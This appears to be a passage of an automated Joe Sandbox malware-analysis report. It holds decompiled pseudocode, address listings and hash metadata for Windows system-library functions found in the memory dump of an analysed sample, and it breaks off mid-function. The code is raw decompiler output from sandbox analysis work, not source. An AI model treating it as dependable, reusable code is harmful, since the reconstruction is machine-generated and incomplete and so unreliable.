                                                                                                                              0x1d7c94cc
                                                                                                                              0x1d7c94cf
                                                                                                                              0x1d7c94d0
                                                                                                                              0x1d7c94da
                                                                                                                              0x1d7c94dd
                                                                                                                              0x1d7c94e0
                                                                                                                              0x1d7c94e5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c94e5
                                                                                                                              0x1d7c94e7
                                                                                                                              0x1d7c94ec
                                                                                                                              0x00000000
                                                                                                                              0x1d7c94ee
                                                                                                                              0x1d7c94f6
                                                                                                                              0x1d7c94f9
                                                                                                                              0x1d7c94ff
                                                                                                                              0x1d7c9502
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9504
                                                                                                                              0x1d7c950e
                                                                                                                              0x1d7c9512
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9514
                                                                                                                              0x1d7c951d
                                                                                                                              0x1d7c951d
                                                                                                                              0x1d7c951f
                                                                                                                              0x1d7c9523
                                                                                                                              0x1d7c9528
                                                                                                                              0x1d7c9534
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9536
                                                                                                                              0x1d7c9536
                                                                                                                              0x1d7c9538
                                                                                                                              0x1d7c953b
                                                                                                                              0x1d7c953d
                                                                                                                              0x00000000
                                                                                                                              0x1d7c953d
                                                                                                                              0x1d7c9534
                                                                                                                              0x1d7c9512
                                                                                                                              0x1d7c9502
                                                                                                                              0x1d7c94ec
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9543
                                                                                                                              0x1d7c9543
                                                                                                                              0x1d7c954a
                                                                                                                              0x1d7c954b
                                                                                                                              0x00000000
                                                                                                                              0x1d7c94a5
                                                                                                                              0x1d7c949c
                                                                                                                              0x1d7c947c
                                                                                                                              0x1d7c9562
                                                                                                                              0x1d7c9566

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: verifier.dll
                                                                                                                              • API String ID: 0-3265496382
                                                                                                                              • Opcode ID: c2a14a49c8e645189df9fb7889693ef1ff01acd80ae913639cfb757ee31261a2
                                                                                                                              • Instruction ID: fb584c90694f2791b41e4eb179c2e9ad6138bf3b89f72afbb81f5e77f2d8f5d1
                                                                                                                              • Opcode Fuzzy Hash: c2a14a49c8e645189df9fb7889693ef1ff01acd80ae913639cfb757ee31261a2
                                                                                                                              • Instruction Fuzzy Hash: 9A31D8B5700253AFD7548F58E891B3AB3F5EB48721F91846AEA08DF381E731DD808792
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D777425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E1D777425(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				signed int _t72;
				void* _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t79;

				_v12 = _v12 & 0x00000000;
				_t77 = __edx;
				_t75 = __ecx;
				if(__edx == 0 || __ecx == 0) {
					L24:
					return 0xc000000d;
				} else {
					_t62 = _a4;
					if(_t62 == 0) {
						goto L24;
					}
					_v16 =  *_t62;
					_t64 = E1D755D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xaa);
					_v20 = _t64;
					if(_t64 == 0) {
						return 0xc0000017;
					}
					_t45 =  *(_t77 + 6) & 0x0000ffff;
					if(( *(_t77 + 6) & 0x0000ffff) <= 0) {
						_v24 = _t64;
						_v28 = 0xaa0000;
						if(E1D764F40( *(_t77 + 4) & 0x0000ffff,  &_v28) != 0) {
							L6:
							_t76 = _a8;
							_t66 = _a12;
							if( *_t62 <= 0 ||  *_t62 > _t66) {
								L8:
								_t72 = _v16;
								_t20 = _t72 + 1; // 0x1
								_t79 = _t20 + ((_v28 & 0x0000ffff) >> 1);
								if(_t76 != 0) {
									if(_t72 >= _t79) {
										goto L9;
									}
									if(_t79 >= _t66) {
										L10:
										if(_t76 != 0) {
											_v12 = 0xc0000023;
										}
										L11:
										 *_t62 = _t79;
										goto L12;
									}
									E1D7888C0(_t76 + _t72 * 2, _v24, _v28 & 0x0000ffff);
									 *((short*)(_t76 + _t79 * 2 - 2)) = 0;
									goto L11;
								}
								L9:
								if(_t79 < _t66) {
									goto L11;
								}
								goto L10;
							} else {
								if(E1D762CEB(_v24,  *_t62) != 0) {
									L12:
									E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v20);
									return _v12;
								}
								_t66 = _a12;
								goto L8;
							}
						}
						_v12 = 0xc00000e5;
						goto L12;
					}
					E1D785050( *( *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0xc)) + _t45 * 2),  &_v28,  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0x10)) +  *( *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0xc)) + _t45 * 2) * 2);
					goto L6;
				}
			}
















                                                                                                                              0x1d77742d
                                                                                                                              0x1d777433
                                                                                                                              0x1d777436
                                                                                                                              0x1d77743a
                                                                                                                              0x1d7b4439
                                                                                                                              0x00000000
                                                                                                                              0x1d777448
                                                                                                                              0x1d777448
                                                                                                                              0x1d77744d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d777455
                                                                                                                              0x1d77746e
                                                                                                                              0x1d777470
                                                                                                                              0x1d777475
                                                                                                                              0x00000000
                                                                                                                              0x1d7b4417
                                                                                                                              0x1d77747b
                                                                                                                              0x1d777482
                                                                                                                              0x1d7774f6
                                                                                                                              0x1d7774fe
                                                                                                                              0x1d77750c
                                                                                                                              0x1d7774a1
                                                                                                                              0x1d7774a4
                                                                                                                              0x1d7774a7
                                                                                                                              0x1d7774aa
                                                                                                                              0x1d7774b4
                                                                                                                              0x1d7774b4
                                                                                                                              0x1d7774bd
                                                                                                                              0x1d7774c0
                                                                                                                              0x1d7774c4
                                                                                                                              0x1d777515
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d777519
                                                                                                                              0x1d7774ca
                                                                                                                              0x1d7774cc
                                                                                                                              0x1d7b442d
                                                                                                                              0x1d7b442d
                                                                                                                              0x1d7774d2
                                                                                                                              0x1d7774d2
                                                                                                                              0x00000000
                                                                                                                              0x1d7774d2
                                                                                                                              0x1d777527
                                                                                                                              0x1d777531
                                                                                                                              0x00000000
                                                                                                                              0x1d777531
                                                                                                                              0x1d7774c6
                                                                                                                              0x1d7774c8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d777538
                                                                                                                              0x1d777546
                                                                                                                              0x1d7774d4
                                                                                                                              0x1d7774e3
                                                                                                                              0x00000000
                                                                                                                              0x1d7774e8
                                                                                                                              0x1d777548
                                                                                                                              0x00000000
                                                                                                                              0x1d777548
                                                                                                                              0x1d7774aa
                                                                                                                              0x1d7b4421
                                                                                                                              0x00000000
                                                                                                                              0x1d7b4421
                                                                                                                              0x1d77749c
                                                                                                                              0x00000000
                                                                                                                              0x1d77749c

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #
                                                                                                                              • API String ID: 0-1885708031
                                                                                                                              • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                              • Instruction ID: a5d5d6572bba2c967455a2f25cae8d8fd0382fc9151c7632883e7cadd76c0570
                                                                                                                              • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                              • Instruction Fuzzy Hash: 8741FF35A0421AEBCF11CF88C484BBEBBB4FF40729F01485AEA44A7250D730A851CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73FF30 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 83%
                                                                                                                              			E1D73FF30(intOrPtr* _a4) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr* _t43;
				char _t70;
				intOrPtr _t77;
				intOrPtr* _t79;

				_t79 = _a4;
				_t70 = 0;
				_t77 =  *[fs:0x30];
				_v32 = 0;
				_v28 = 0;
				_v12 = 0;
				 *((intOrPtr*)(_t79 + 4)) =  *((intOrPtr*)(_t77 + 0xa4));
				 *((intOrPtr*)(_t79 + 8)) =  *((intOrPtr*)(_t77 + 0xa8));
				 *(_t79 + 0xc) =  *(_t77 + 0xac) & 0x0000ffff;
				 *((intOrPtr*)(_t79 + 0x10)) =  *((intOrPtr*)(_t77 + 0xb0));
				_t43 =  *((intOrPtr*)(_t77 + 0x1f4));
				if(_t43 != 0 &&  *_t43 != 0) {
					if(E1D765C3F(_t79 + 0x14, 0x100, _t43) < 0) {
						 *((short*)(_t79 + 0x14)) = 0;
					}
					_t70 = 0;
				} else {
					 *((short*)(_t79 + 0x14)) = 0;
				}
				if( *_t79 != 0x11c) {
					if( *_t79 != 0x124) {
						L10:
						return 0;
					}
				}
				 *((short*)(_t79 + 0x114)) =  *(_t77 + 0xaf) & 0x000000ff;
				 *(_t79 + 0x116) =  *(_t77 + 0xae) & 0x000000ff;
				 *(_t79 + 0x118) = E1D740670();
				if( *_t79 == 0x124) {
					 *(_t79 + 0x11c) = E1D740670() & 0x0001ffff;
				}
				 *((char*)(_t79 + 0x11a)) = _t70;
				if(E1D740630( &_v16) != 0) {
					 *((char*)(_t79 + 0x11a)) = _v16;
				}
				E1D785050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
				_push( &_v24);
				_push(4);
				_push( &_v12);
				_push( &_v20);
				_push( &_v32);
				if(E1D783EE0() < 0 || _v12 != 1 || _v20 != 4 || _v24 != 4) {
					 *(_t79 + 0x118) =  *(_t79 + 0x118) & 0x0000ffef | 0x00000100;
					if( *_t79 == 0x124) {
						 *(_t79 + 0x11c) =  *(_t79 + 0x11c) & 0xfffdffef | 0x00000100;
					}
				}
				goto L10;
			}













                                                                                                                              0x1d73ff3a
                                                                                                                              0x1d73ff3d
                                                                                                                              0x1d73ff40
                                                                                                                              0x1d73ff4c
                                                                                                                              0x1d73ff4f
                                                                                                                              0x1d73ff52
                                                                                                                              0x1d73ff5b
                                                                                                                              0x1d73ff64
                                                                                                                              0x1d73ff6e
                                                                                                                              0x1d73ff77
                                                                                                                              0x1d73ff7a
                                                                                                                              0x1d73ff82
                                                                                                                              0x1d79e82e
                                                                                                                              0x1d79e832
                                                                                                                              0x1d79e832
                                                                                                                              0x1d79e836
                                                                                                                              0x1d73ff8d
                                                                                                                              0x1d73ff8f
                                                                                                                              0x1d73ff8f
                                                                                                                              0x1d73ff99
                                                                                                                              0x1d74005c
                                                                                                                              0x1d74004f
                                                                                                                              0x1d740053
                                                                                                                              0x1d740053
                                                                                                                              0x1d74005e
                                                                                                                              0x1d73ffab
                                                                                                                              0x1d73ffbc
                                                                                                                              0x1d73ffcd
                                                                                                                              0x1d73ffd6
                                                                                                                              0x1d74006d
                                                                                                                              0x1d74006d
                                                                                                                              0x1d73ffdf
                                                                                                                              0x1d73ffed
                                                                                                                              0x1d73fff2
                                                                                                                              0x1d73fff2
                                                                                                                              0x1d740001
                                                                                                                              0x1d740009
                                                                                                                              0x1d74000a
                                                                                                                              0x1d74000f
                                                                                                                              0x1d740013
                                                                                                                              0x1d740017
                                                                                                                              0x1d74001f
                                                                                                                              0x1d740042
                                                                                                                              0x1d74004b
                                                                                                                              0x1d740085
                                                                                                                              0x1d740085
                                                                                                                              0x1d74004b
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1D73FFF8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                                                                              • API String ID: 0-996340685
                                                                                                                              • Opcode ID: b31e8b265ef01428cd20773efcac33bf75c876f80599e460b4f5fa37e766406e
                                                                                                                              • Instruction ID: fbf8ccfb526e62e996249b367441a81bba046c7421b3738bc7d47a09cc8d2b5a
                                                                                                                              • Opcode Fuzzy Hash: b31e8b265ef01428cd20773efcac33bf75c876f80599e460b4f5fa37e766406e
                                                                                                                              • Instruction Fuzzy Hash: 20417175A00756AEC726DFB4C4406EBF7F4AF05320F10882EDAAAC3250E334A545CB93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7D7CE8 Relevance: .6, Instructions: 617COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E1D7D7CE8(intOrPtr __ecx, signed int __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int* _a28) {
				signed int _v8;
				char _v48;
				char _v56;
				signed int _v96;
				char _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				char _v117;
				char _v118;
				signed int _v124;
				signed int* _v128;
				char _v129;
				char _v130;
				signed int _v136;
				signed int* _v140;
				signed int _v144;
				signed int _v148;
				short _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int* _v164;
				signed int _v168;
				signed int _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				signed int _v204;
				char _v208;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t282;
				signed int _t287;
				signed int _t289;
				signed int _t290;
				signed int _t299;
				intOrPtr* _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t313;
				signed char _t320;
				signed int _t324;
				signed int _t325;
				signed int _t340;
				signed int _t355;
				char _t361;
				signed short _t362;
				signed int _t369;
				signed int _t379;
				signed int _t381;
				signed int _t382;
				signed int _t405;
				signed int _t410;
				signed int _t413;
				signed int _t417;
				signed int _t418;
				intOrPtr _t419;
				unsigned int _t420;
				signed int _t421;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				intOrPtr _t433;
				signed int _t435;
				signed char* _t438;
				intOrPtr _t444;
				signed int _t446;
				intOrPtr _t447;
				signed int _t449;
				signed int _t451;
				signed int _t452;
				intOrPtr _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int* _t460;
				signed int _t463;
				signed int _t464;
				signed int _t472;
				signed int _t473;
				signed char _t479;
				intOrPtr _t480;
				signed int _t482;
				signed int _t484;
				signed char _t488;
				signed int _t492;
				signed int _t495;
				signed char _t499;
				signed int _t502;
				intOrPtr _t504;
				intOrPtr* _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t511;
				signed int _t512;
				signed short _t513;
				signed int _t514;
				signed int* _t517;
				signed int* _t518;
				signed int _t519;
				intOrPtr _t520;
				signed int _t523;
				signed int* _t525;
				signed int _t527;
				void* _t528;

				_t466 = __edx;
				_v8 =  *0x1d83b370 ^ _t527;
				_t417 = __edx;
				_v124 = __edx;
				_v180 = __ecx;
				_v176 = _a12;
				_v200 = _a16;
				_v140 = _a24;
				_v112 = 0;
				_v144 = 0;
				_v168 = 0;
				_v156 = 0;
				_t517 = _a28;
				_v128 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_v164 = _t517;
				_v152 = 0x300;
				_t282 = E1D7682F0( &_v104,  &_v156, 1);
				_t503 = _t282;
				if(_t282 < 0) {
					L16:
					return E1D784B50(_t503, _t417, _v8 ^ _t527, _t466, _t503, _t517);
				}
				_v96 = _v96 & 0x00000000;
				_t287 = E1D7682F0( &_v56,  &_v156, 1);
				_t503 = _t287;
				if(_t287 < 0) {
					goto L16;
				}
				_t504 = _v180;
				 *_t517 = 0x400;
				_v48 = 1;
				 *_v140 =  *_v140 & 0x00000000;
				_t532 = _t504;
				if(_t504 == 0) {
					L5:
					_push(_t417);
					_t289 = E1D763770(_t417, _t504, _t517, __eflags);
					__eflags = _t289;
					if(_t289 == 0) {
						L4:
						_t503 = 0xc0000077;
						goto L16;
					}
					_t290 = _a4;
					_v156 = _t290;
					__eflags = _t290;
					asm("sbb eax, eax");
					_t299 = E1D767882(_t504, 0, 0, _a8, 1, 0,  &_v104,  &_v56,  &_v104,  &_v56, _a20, 2,  ~_t290 &  &_a4, 0 | _t290 != 0x00000000,  &_v112,  &_v130,  &_v208);
					_t466 = _v112;
					_t503 = _t299;
					_v172 = _t466;
					__eflags = _t503 - 0x8000000b;
					if(_t503 != 0x8000000b) {
						__eflags = _t503;
						if(_t503 < 0) {
							L11:
							_t517 = _v128;
							L12:
							__eflags = _t466;
							if(_t466 != 0) {
								E1D753BC0(_t517, 0, _t466);
							}
							_t417 = _v144;
							__eflags = _t417;
							if(_t417 != 0) {
								E1D753BC0(_t517, 0, _t417);
							}
							goto L16;
						}
						_t433 =  *0x1d835d78; // 0x0
						_t472 = E1D755D90(_t433 + 0x140000, _v128, _t433 + 0x140000, ( *(_t417 + 4) & 0x0000ffff) * 0x18);
						_v168 = _t472;
						__eflags = _t472;
						if(_t472 != 0) {
							_v148 = _v148 & 0x00000000;
							_t305 = _t417 + 8;
							_v136 = _v136 & 0x00000000;
							_t505 = _t305;
							_v160 = _t305;
							_t306 =  *(_t417 + 4) & 0x0000ffff;
							_t435 = _t306;
							__eflags = _v136 - _t306;
							if(_v136 >= _t306) {
								L31:
								_t473 = _v172;
								_v136 = _v136 & 0x00000000;
								_t307 = _t435 & 0x0000ffff;
								_t506 = _t473 + 8;
								_v112 = _t506;
								__eflags = 0 -  *((intOrPtr*)(_t473 + 4));
								if(0 >=  *((intOrPtr*)(_t473 + 4))) {
									L53:
									_t308 = _t307 & 0x0000ffff;
									_v118 = 0;
									_t507 = 0;
									_v117 = 0;
									_v108 = 0;
									_t438 = _t417 + 8;
									_v112 = 0;
									_v184 = _t308;
									__eflags = _t308;
									if(_t308 == 0) {
										L68:
										__eflags = _v156;
										asm("sbb ecx, ecx");
										_t503 = E1D767882(_v180, 0, 0, _a8, 1, 0, _v176, _v200, _v176, _v200, _a20, 2,  ~_v156 &  &_a4, 0 | _v156 != 0x00000000,  &_v144,  &_v130,  &_v208);
										__eflags = _t503;
										if(_t503 < 0) {
											L95:
											_t313 = _v168;
											_t517 = _v128;
											__eflags = _t313;
											if(_t313 != 0) {
												E1D753BC0(_t517, 0, _t313);
											}
											_t466 = _v172;
											goto L12;
										}
										_t508 = _v144;
										_t444 =  *0x1d835d78; // 0x0
										_t446 = E1D755D90(_t444 + 0x140000, _v128, _t444 + 0x140000, ( *(_t508 + 2) & 0x0000ffff) + _v108);
										 *_v140 = _t446;
										__eflags = _t446;
										if(_t446 == 0) {
											L93:
											_t503 = 0xc0000017;
											goto L95;
										}
										_t479 =  *_t417;
										_t320 =  *_t508;
										__eflags = _t320 - _t479;
										if(_t320 <= _t479) {
											_t320 = _t479;
										}
										_t324 = E1D767C20(_t446, ( *(_t508 + 2) & 0x0000ffff) + _v108, _t320 & 0x000000ff);
										__eflags = _t324;
										if(_t324 < 0) {
											goto L7;
										} else {
											_t480 = 0;
											_v176 = 0;
											_t451 =  *_v140 + 8;
											_v108 = _t451;
											__eflags = 0 -  *(_t417 + 4);
											if(0 >=  *(_t417 + 4)) {
												L87:
												_t418 = _v144;
												E1D7888C0(_t451, _t418 + 8, ( *(_t508 + 2) & 0x0000ffff) - 8);
												_t528 = _t528 + 0xc;
												_t452 =  *_v140;
												_t259 = _t452 + 4;
												 *_t259 =  *(_t452 + 4) +  *((intOrPtr*)(_t418 + 4));
												__eflags =  *_t259;
												L88:
												_t417 = _v124;
												L89:
												_t325 =  *_t517;
												_t503 = 0;
												__eflags = _t325 & 0x00001000;
												if((_t325 & 0x00001000) == 0) {
													goto L95;
												}
												_t518 = _v140;
												__eflags =  *_t518;
												if( *_t518 != 0) {
													E1D753BC0(_v128, 0,  *_t518);
													 *_t518 =  *_t518 & 0;
													__eflags =  *_t518;
												}
												_t447 =  *0x1d835d78; // 0x0
												_t449 = E1D755D90(_t447 + 0x140000, _v128, _t447 + 0x140000,  *(_t417 + 2) & 0x0000ffff);
												 *_t518 = _t449;
												__eflags = _t449;
												if(_t449 != 0) {
													E1D7888C0(_t449, _t417,  *(_t417 + 2) & 0x0000ffff);
													_t503 = 0;
													__eflags = 0;
													goto L95;
												} else {
													goto L93;
												}
											}
											_t519 = _t451;
											_t340 = _v168 + 0x10;
											__eflags = _t340;
											_t453 = _t417 + 8;
											_v112 = _t340;
											do {
												_t511 =  *(_t340 - 4) |  *(_t340 + 4) |  *_t340;
												__eflags = _t511;
												if(_t511 == 0) {
													goto L85;
												}
												_t419 = _v160;
												E1D7888C0(_t519, _t419,  *(_t419 + 2) & 0x0000ffff);
												 *(_t519 + 1) =  *(_t519 + 1) & 0x000000ef;
												_t454 = _t519;
												_t528 = _t528 + 0xc;
												_t519 = _t519 + ( *(_t419 + 2) & 0x0000ffff);
												_v180 = _t454;
												_v108 = _t519;
												 *((short*)( *_v140 + 4)) =  *((short*)( *_v140 + 4)) + 1;
												 *(_t454 + 4) =  *(_t419 + 4) & _t511;
												_t420 = 0x80000000;
												_t512 = _t511 &  !( *(_t419 + 4));
												__eflags = _t512;
												if(_t512 == 0) {
													L84:
													_t239 = _t454 + 4;
													 *_t239 =  *(_t454 + 4) | _t512;
													__eflags =  *_t239;
													_t340 = _v112;
													_t417 = _v124;
													_t480 = _v176;
													_t453 = _v160;
													goto L85;
												}
												_t520 = _v160;
												do {
													__eflags = _t420 - 0x10000000;
													if(_t420 < 0x10000000) {
														break;
													}
													__eflags =  *(_t520 + 4) & _t420;
													if(( *(_t520 + 4) & _t420) != 0) {
														_v136 = _t420;
														E1D7683E0( &_v136, _a20);
														_t355 = _v136;
														_t454 = _v180;
														__eflags = _t512 & _t355;
														if((_t512 & _t355) != 0) {
															 *(_t454 + 4) =  *(_t454 + 4) | _t420;
															_t512 = _t512 &  !_t355;
															__eflags = _t512;
														}
													}
													_t420 = _t420 >> 1;
													__eflags = _t512;
												} while (_t512 != 0);
												_t519 = _v108;
												goto L84;
												L85:
												_t480 = _t480 + 1;
												_v112 = _t340 + 0x18;
												_t453 = _t453 + ( *(_t453 + 2) & 0x0000ffff);
												_v176 = _t480;
												__eflags = _t480 - ( *(_t417 + 4) & 0x0000ffff);
												_v160 = _t453;
												_t340 = _v112;
											} while (_t480 < ( *(_t417 + 4) & 0x0000ffff));
											_t517 = _v164;
											_t451 = _v108;
											_t508 = _v144;
											goto L87;
										}
									}
									_t482 = _v168 + 0x10;
									__eflags = _t482;
									do {
										__eflags =  *(_t482 - 4) |  *(_t482 + 4) |  *_t482;
										_t361 =  *((intOrPtr*)(( *_t438 & 0x000000ff) + 0x1d718980));
										if(( *(_t482 - 4) |  *(_t482 + 4) |  *_t482) != 0) {
											_t513 = _t438[2] & 0x0000ffff;
											_v108 = _v108 + _t513;
											_v129 = _t361;
											__eflags = _t361;
											if(_t361 != 0) {
												L64:
												__eflags = _v129 - 1;
												_t362 = _t513;
												if(_v129 != 1) {
													L66:
													_t507 = _v112;
													goto L67;
												}
												__eflags = _v118;
												if(_v118 != 0) {
													goto L7;
												}
												goto L66;
											}
											__eflags = _v117 - _t361;
											if(_v117 != _t361) {
												goto L7;
											}
											goto L64;
										}
										__eflags = _t361;
										if(_t361 == 0) {
											_v118 = 1;
										}
										__eflags = _t361 - 1;
										if(_t361 == 1) {
											_v117 = _t361;
										}
										_t362 = _t438[2] & 0x0000ffff;
										L67:
										_t507 = _t507 + 1;
										_t482 = _t482 + 0x18;
										_v112 = _t507;
										_t438 =  &(_t438[_t362 & 0x0000ffff]);
										__eflags = _t507 - _v184;
									} while (_t507 < _v184);
									goto L68;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t421 =  *_t506;
									__eflags = _t421 - 8;
									if(_t421 > 8) {
										break;
									}
									__eflags = _t421 - 4;
									if(_t421 == 4) {
										break;
									}
									_v116 =  *((intOrPtr*)(_t506 + 4));
									E1D7683E0( &_v116, _a20);
									__eflags = _t421;
									if(_t421 == 0) {
										L40:
										_t455 =  *(_a20 + 0xc);
										L41:
										_t456 = _t455 & _v116;
										__eflags = _t456;
										if(_t456 == 0) {
											L61:
											_t417 = _v124;
											L51:
											_t506 = _t506 + ( *(_t506 + 2) & 0x0000ffff);
											_t369 = _v172;
											_t484 = _v136 + 1;
											_v136 = _t484;
											_v112 = _t506;
											__eflags = _t484 - ( *(_t369 + 4) & 0x0000ffff);
											if(_t484 < ( *(_t369 + 4) & 0x0000ffff)) {
												continue;
											}
											_t307 =  *(_t417 + 4) & 0x0000ffff;
											goto L53;
										}
										_t488 =  !( *(_t506 + 1) & 0x000000ff) & 0x00000008 |  *(_t506 + 1) & 3;
										__eflags = _t488;
										if(_t488 == 0) {
											goto L61;
										}
										asm("sbb ebx, ebx");
										_t424 =  ~(_t488 & 2) & _t456;
										_v188 = _t424;
										_v108 = _t424;
										_t417 = _v124;
										asm("sbb eax, eax");
										_t379 =  ~(_t488 & 1) & _t456;
										_v184 = _t379;
										_v116 = _t379;
										asm("sbb edx, edx");
										_v192 = _v192 & 0x00000000;
										_t492 =  ~(_t488 & 8) & _t456;
										_t458 = _v160;
										_t514 = _t492;
										__eflags = 0 -  *(_t417 + 4);
										_t517 = _v164;
										_v204 = _t492;
										_v196 = _v160;
										if(0 >=  *(_t417 + 4)) {
											L49:
											__eflags = _t514 | _v116 | _v108;
											if((_t514 | _v116 | _v108) != 0) {
												goto L7;
											}
											_t506 = _v112;
											goto L51;
										}
										_v116 = _t379;
										_t381 = _v168 + 0x14;
										__eflags = _t381;
										_v108 = _v188;
										_t523 = _v112;
										_v148 = _t381;
										do {
											_t382 = E1D768535(_t523, _t458, _v176, _v200);
											_t460 = _v148;
											__eflags = _t382;
											if(_t382 != 0) {
												_t514 = _t514 &  !( *(_t460 - 0xc));
												_v108 = _v108 &  !( *(_t460 - 0x14));
												_v116 = _v116 &  !( *(_t460 - 0x10));
												 *_t460 =  *_t460 &  !_v204;
												 *(_t460 - 8) =  *(_t460 - 8) &  !_v188;
												_t140 = _t460 - 4;
												 *_t140 =  *(_t460 - 4) &  !_v184;
												__eflags =  *_t140;
											}
											_v148 =  &(_t460[6]);
											_t495 = _v192 + 1;
											_t462 = _v196;
											_v192 = _t495;
											_t458 = _v196 + ( *(_t462 + 2) & 0x0000ffff);
											_v196 = _v196 + ( *(_t462 + 2) & 0x0000ffff);
											__eflags = _t495 - ( *(_t417 + 4) & 0x0000ffff);
										} while (_t495 < ( *(_t417 + 4) & 0x0000ffff));
										_t517 = _v164;
										goto L49;
									}
									__eflags = _t421 - 1;
									if(_t421 == 1) {
										goto L40;
									}
									__eflags = _t421 - 5;
									if(_t421 == 5) {
										goto L40;
									}
									__eflags = _t421 - 6;
									if(_t421 == 6) {
										goto L40;
									}
									_t455 =  *(_a20 + 0xc) | 0x01000000;
									goto L41;
								}
								L39:
								 *_t517 =  *_t517 | 0x00001000;
								goto L88;
							}
							_t59 = _t472 + 4; // 0x4
							_v116 = _t59;
							while(1) {
								_t425 =  *_t505;
								__eflags = _t425 - 8;
								if(_t425 > 8) {
									goto L39;
								}
								__eflags = _t425 - 4;
								if(_t425 == 4) {
									goto L39;
								}
								_v108 =  *((intOrPtr*)(_t505 + 4));
								E1D7683E0( &_v108, _a20);
								__eflags = _t425;
								if(_t425 == 0) {
									L26:
									_t463 =  *(_a20 + 0xc);
									L27:
									_t464 = _t463 & _v108;
									_t499 =  !( *(_t505 + 1) & 0x000000ff) & 0x00000008 |  *(_t505 + 1) & 3;
									_t405 = _v116;
									__eflags = _t499 & 0x00000002;
									if((_t499 & 0x00000002) == 0) {
										_t426 = 0;
										_t75 =  &_v112;
										 *_t75 = _v112 & 0;
										__eflags =  *_t75;
									} else {
										_t426 = _t464;
